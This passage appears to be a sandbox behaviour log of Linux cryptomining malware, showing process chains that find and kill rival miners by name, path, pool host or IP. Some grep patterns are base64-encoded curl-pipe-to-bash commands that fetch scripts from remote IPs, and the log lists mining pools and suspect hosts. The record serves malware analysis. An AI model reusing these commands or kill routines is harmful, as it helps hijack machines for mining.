  - Reads CPU attributes
  PID:2093
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2102
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2101
- /bin/grep
  grep watchd0g
  2⤵
  PID:2100
- /bin/grep
  grep -v grep
  2⤵
  PID:2099
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2098
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2107
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2106
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2105
- /bin/grep
  grep -v grep
  2⤵
  PID:2104
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2105
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2105
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2105
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2105
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2105
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2105
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2103
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2112
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2111
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  PID:2110
- /bin/grep
  grep -v grep
  2⤵
  PID:2109
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2108
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2117
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2116
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2115
- /bin/grep
  grep -v grep
  2⤵
  PID:2114
- /bin/ps
  ps aux
  2⤵
  PID:2113
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2122
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2121
- /bin/grep
  grep gitee.com
  2⤵
  PID:2120
- /bin/grep
  grep -v grep
  2⤵
  PID:2119
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2118
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2127
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2126
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2125
- /bin/grep
  grep -v grep
  2⤵
  PID:2124
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2123
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2137
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2136
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:2135
- /bin/grep
  grep -v grep
  2⤵
  PID:2134
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2133
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2144
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2143
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:2142
- /bin/grep
  grep -v grep
  2⤵
  PID:2141
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2140
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2149
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2148
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:2147
- /bin/grep
  grep -v grep
  2⤵
  PID:2146
- /bin/ps
  ps aux
  2⤵
  PID:2145
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2155
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2154
- /bin/grep
  grep kthrotlds
  2⤵
  PID:2153
- /bin/grep
  grep -v grep
  2⤵
  PID:2152
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2151
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2160
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2159
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:2158
- /bin/grep
  grep -v grep
  2⤵
  PID:2157
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2156
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2165
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2164
- /bin/grep
  grep netdns
  2⤵
  PID:2163
- /bin/grep
  grep -v grep
  2⤵
  PID:2162
- /bin/ps
  ps aux
  2⤵
  PID:2161
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2170
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2169
- /bin/grep
  grep watchdogs
  2⤵
  PID:2168
- /bin/grep
  grep -v grep
  2⤵
  PID:2167
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2166
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2181
- /usr/bin/awk
  awk "\$3>80.0{print \$2}"
  2⤵
  PID:2180
- /bin/grep
  grep -v atd
  2⤵
  PID:2178
- /bin/grep
  grep -v salt-minions
  2⤵
  PID:2179
- /bin/grep
  grep -v apache2
  2⤵
  PID:2177
- /bin/grep
  grep -v dblaunched
  2⤵
  PID:2176
- /bin/grep
  grep -v dblaunchs
  2⤵
  PID:2175
- /bin/grep
  grep -v dblaunch
  2⤵
  PID:2174
- /bin/grep
  grep -v root
  2⤵
  PID:2173
- /bin/grep
  grep -v grep
  2⤵
  PID:2172
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:2171
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2187
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2186
- /bin/grep
  grep " ps"
  2⤵
  PID:2185
- /bin/grep
  grep -v aux
  2⤵
  PID:2184
- /bin/grep
  grep -v grep
  2⤵
  PID:2183
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2182
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2192
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2191
- /bin/grep
  grep sync_supers
  2⤵
  PID:2190
- /bin/grep
  grep -v grep
  2⤵
  PID:2189
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2188
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2197
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2196
- /bin/grep
  grep cpuset
  2⤵
  PID:2195
- /bin/grep
  grep -v grep
  2⤵
  PID:2194
- /bin/ps
  ps aux
  2⤵
  PID:2193
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2203
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2202
- /bin/grep
  grep "x]"
  2⤵
  PID:2201
- /bin/grep
  grep -v aux
  2⤵
  PID:2200
- /bin/grep
  grep -v grep
  2⤵
  PID:2199
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2198
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2209
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2208
- /bin/grep
  grep "sh] <"
  2⤵
  PID:2207
- /bin/grep
  grep -v aux
  2⤵
  PID:2206
- /bin/grep
  grep -v grep
  2⤵
  PID:2205
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2204
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2215
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2214
- /bin/grep
  grep " \\[]"
  2⤵
  PID:2213
- /bin/grep
  grep -v aux
  2⤵
  PID:2212
- /bin/grep
  grep -v grep
  2⤵
  PID:2211
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2210
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2220
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2219
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:2218
- /bin/grep
  grep -v grep
  2⤵
  PID:2217
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2216
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2225
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2224
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:2223
- /bin/grep
  grep -v grep
  2⤵
  PID:2222
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2221
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2230
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2229
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:2228
- /bin/grep
  grep -v grep
  2⤵
  PID:2227
- /bin/ps
  ps aux
  2⤵
  PID:2226
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2235
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2234
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:2233
- /bin/grep
  grep -v grep
  2⤵
  PID:2232
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2231
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2240
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2239
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:2238
- /bin/grep
  grep -v grep
  2⤵
  PID:2237
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2236
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2245
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2244
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  - System Network Configuration Discovery
  PID:2243
- /bin/grep
  grep -v grep
  2⤵
  PID:2242
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2241
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2250
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2249
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:2248
- /bin/grep
  grep -v grep
  2⤵
  PID:2247
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2246
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2255
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2254
- /bin/grep
  grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
  2⤵
  PID:2253
- /bin/grep
  grep -v grep
  2⤵
  PID:2252
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2251
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2260
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2259
- /bin/grep
  grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
  2⤵
  PID:2258
- /bin/grep
  grep -v grep
  2⤵
  PID:2257
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2256
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2265
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2264
- /bin/grep
  grep sustse
  2⤵
  PID:2263
- /bin/grep
  grep -v grep
  2⤵
  PID:2262
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2261
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2270
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2269
- /bin/grep
  grep sustse3
  2⤵
  PID:2268
- /bin/grep
  grep -v grep
  2⤵
  PID:2267
- /bin/ps
  ps aux
  2⤵
  PID:2266
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2276
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2275
- /bin/grep
  grep wget
  2⤵
  PID:2274
- /bin/grep
  grep mr.sh
  2⤵
  PID:2273
- /bin/grep
  grep -v grep
  2⤵
  PID:2272
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2271
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2282
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2281
- /bin/grep
  grep curl
  2⤵
  PID:2280
- /bin/grep
  grep mr.sh
  2⤵
  PID:2279
- /bin/grep
  grep -v grep
  2⤵
  PID:2278
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2277
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2288
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2287
- /bin/grep
  grep wget
  2⤵
  PID:2286
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2285
- /bin/grep
  grep -v grep
  2⤵
  PID:2284
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2283
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2294
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2293
- /bin/grep
  grep curl
  2⤵
  PID:2292
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2291
- /bin/grep
  grep -v grep
  2⤵
  PID:2290
- /bin/ps
  ps aux
  2⤵
  PID:2289
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2300
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2299
- /bin/grep
  grep wget
  2⤵
  PID:2298
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2297
- /bin/grep
  grep -v grep
  2⤵
  PID:2296
- /bin/ps
  ps aux
  2⤵
  PID:2295
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2306
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2305
- /bin/grep
  grep curl
  2⤵
  PID:2304
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2303
- /bin/grep
  grep -v grep
  2⤵
  PID:2302
- /bin/ps
  ps aux
  2⤵
  PID:2301
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2312
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2311
- /bin/grep
  grep wget
  2⤵
  PID:2310
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2309
- /bin/grep
  grep -v grep
  2⤵
  PID:2308
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2307
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2318
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2317
- /bin/grep
  grep curl
  2⤵
  PID:2316
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2315
- /bin/grep
  grep -v grep
  2⤵
  PID:2314
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2313
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2323
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2322
- /bin/grep
  grep j2.conf
  2⤵
  PID:2321
- /bin/grep
  grep -v grep
  2⤵
  PID:2320
- /bin/ps
  ps aux
  2⤵
  PID:2319
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2329
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2328
- /bin/grep
  grep wget
  2⤵
  PID:2327
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2326
- /bin/grep
  grep -v grep
  2⤵
  PID:2325
- /bin/ps
  ps aux
  2⤵
  PID:2324
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2335
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2334
- /bin/grep
  grep curl
  2⤵
  PID:2333
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2332
- /bin/grep
  grep -v grep
  2⤵
  PID:2331
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2330
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2341
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2340
- /bin/grep
  grep wget
  2⤵
  PID:2339
- /bin/grep
  grep ficov
  2⤵
  PID:2338
- /bin/grep
  grep -v grep
  2⤵
  PID:2337
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2336
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2347
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2346
- /bin/grep
  grep curl
  2⤵
  PID:2345
- /bin/grep
  grep ficov
  2⤵
  PID:2344
- /bin/grep
  grep -v grep
  2⤵
  PID:2343
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2342
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2353
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2352
- /bin/grep
  grep wget
  2⤵
  PID:2351
- /bin/grep
  grep he.sh
  2⤵
  PID:2350
- /bin/grep
  grep -v grep
  2⤵
  PID:2349
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2348
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2359
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2358
- /bin/grep
  grep curl
  2⤵
  PID:2357
- /bin/grep
  grep he.sh
  2⤵
  PID:2356
- /bin/grep
  grep -v grep
  2⤵
  PID:2355
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2354
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2365
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2364
- /bin/grep
  grep wget
  2⤵
  PID:2363
- /bin/grep
  grep miner.sh
  2⤵
  PID:2362
- /bin/grep
  grep -v grep
  2⤵
  PID:2361
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:2360
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2371
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2370
- /bin/grep
  grep curl
  2⤵
  PID:2369
- /bin/grep
  grep miner.sh
  2⤵
  PID:2368
- /bin/grep
  grep -v grep
  2⤵
  PID:2367
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2366
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2377
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2376
- /bin/grep
  grep wget
  2⤵
  PID:2375
- /bin/grep
  grep nullcrew
  2⤵
  PID:2374
- /bin/grep
  grep -v grep
  2⤵
  PID:2373
- /bin/ps
  ps aux
  2⤵
  PID:2372
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2383
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2382
- /bin/grep
  grep curl
  2⤵
  PID:2381
- /bin/grep
  grep nullcrew
  2⤵
  PID:2380
- /bin/grep
  grep -v grep
  2⤵
  PID:2379
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:2378
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2388
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2387
- /bin/grep
  grep 107.174.47.156
  2⤵
  PID:2386
- /bin/grep
  grep -v grep
  2⤵
  PID:2385
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:2384
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2393
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2392
- /bin/grep
  grep 83.220.169.247
  2⤵
  PID:2391
- /bin/grep
  grep -v grep
  2⤵
  PID:2390
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2389
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2398
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2397
- /bin/grep
  grep 51.38.203.146
  2⤵
  PID:2396
- /bin/grep
  grep -v grep
  2⤵
  PID:2395
- /bin/ps
  ps aux
  2⤵
  PID:2394
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2403
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2402
- /bin/grep
  grep 144.217.45.45
  2⤵
  PID:2401
- /bin/grep
  grep -v grep
  2⤵
  PID:2400
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:2399
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2408
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2407
- /bin/grep
  grep 107.174.47.181
  2⤵
  PID:2406
- /bin/grep
  grep -v grep
  2⤵
  PID:2405
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2404
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2413
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2412
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:2411
- /bin/grep
  grep -v grep
  2⤵
  PID:2410
- /bin/ps
  ps aux
  2⤵
  PID:2409
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2418
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2417
- /bin/grep
  grep mine.moneropool.com
  2⤵
  PID:2416
- /bin/grep
  grep -v grep
  2⤵
  PID:2415
- /bin/ps
  ps auxf
  2⤵
  PID:2414
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2423
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2422
- /bin/grep
  grep pool.t00ls.ru
  2⤵
  PID:2421
- /bin/grep
  grep -v grep
  2⤵
  PID:2420
- /bin/ps
  ps auxf
  2⤵
  PID:2419
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2428
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2427
- /bin/grep
  grep xmr.crypto-pool.fr:8080
  2⤵
  PID:2426
- /bin/grep
  grep -v grep
  2⤵
  PID:2425
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:2424
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2433
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2432
- /bin/grep
  grep xmr.crypto-pool.fr:3333
  2⤵
  PID:2431
- /bin/grep
  grep -v grep
  2⤵
  PID:2430
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2429
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2438
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2437
- /bin/grep
  grep "[email protected]"
  2⤵
  PID:2436
- /bin/grep
  grep -v grep
  2⤵
  PID:2435
- /bin/ps
  ps auxf
  2⤵
  PID:2434
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2443
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2442
- /bin/grep
  grep monerohash.com
  2⤵
  PID:2441
- /bin/grep
  grep -v grep
  2⤵
  PID:2440
- /bin/ps
  ps auxf
  2⤵
  PID:2439
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2448
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2447
- /bin/grep
  grep /tmp/a7b104c270
  2⤵
  PID:2446
- /bin/grep
  grep -v grep
  2⤵
  PID:2445
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2444
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2453
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2452
- /bin/grep
  grep xmr.crypto-pool.fr:6666
  2⤵
  PID:2451
- /bin/grep
  grep -v grep
  2⤵
  PID:2450
- /bin/ps
  ps auxf
  2⤵
  PID:2449
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2458
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2457
- /bin/grep
  grep xmr.crypto-pool.fr:7777
  2⤵
  PID:2456
- /bin/grep
  grep -v grep
  2⤵
  PID:2455
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2454
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2463
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2462
- /bin/grep
  grep xmr.crypto-pool.fr:443
  2⤵
  PID:2461
- /bin/grep
  grep -v grep
  2⤵
  PID:2460
- /bin/ps
  ps auxf
  2⤵
  PID:2459
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2468
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2467
- /bin/grep
  grep stratum.f2pool.com:8888
  2⤵
  PID:2466
- /bin/grep
  grep -v grep
  2⤵
  PID:2465
- /bin/ps
  ps auxf
  2⤵
  PID:2464
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2473
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2472
- /bin/grep
  grep xmrpool.eu
  2⤵
  PID:2471
- /bin/grep
  grep -v grep
  2⤵
  PID:2470
- /bin/ps
  ps auxf
  2⤵
  PID:2469
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2477
- - /usr/local/sbin/kill
    kill -9 2475
    3⤵
    PID:2478
- - /usr/local/bin/kill
    kill -9 2475
    3⤵
    PID:2478
- - /usr/sbin/kill
    kill -9 2475
    3⤵
    PID:2478
- - /usr/bin/kill
    kill -9 2475
    3⤵
    PID:2478
- - /sbin/kill
    kill -9 2475
    3⤵
    PID:2478
- - /bin/kill
    kill -9 2475
    3⤵
    - Reads CPU attributes
    PID:2478
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2476
- /bin/grep
  grep xiaoyao
  2⤵
  PID:2475
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:2474
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2482
- - /usr/local/sbin/kill
    kill -9 2480
    3⤵
    PID:2483
- - /usr/local/bin/kill
    kill -9 2480
    3⤵
    PID:2483
- - /usr/sbin/kill
    kill -9 2480
    3⤵
    PID:2483
- - /usr/bin/kill
    kill -9 2480
    3⤵
    PID:2483
- - /sbin/kill
    kill -9 2480
    3⤵
    PID:2483
- - /bin/kill
    kill -9 2480
    3⤵
    PID:2483
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2481
- /bin/grep
  grep xiaoxue
  2⤵
  PID:2480
- /bin/ps
  ps auxf
  2⤵
  PID:2479
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2489
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:2488
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:2487
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:2486
- /bin/grep
  grep 46.243.253.15
  2⤵
  PID:2485
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2495
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:2494
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:2493
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:2492
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:2491
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2501
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:2500
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:2499
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:2498
- /bin/grep
  grep 108.174.197.76
  2⤵
  PID:2497
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2507
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:2505
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:2506
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
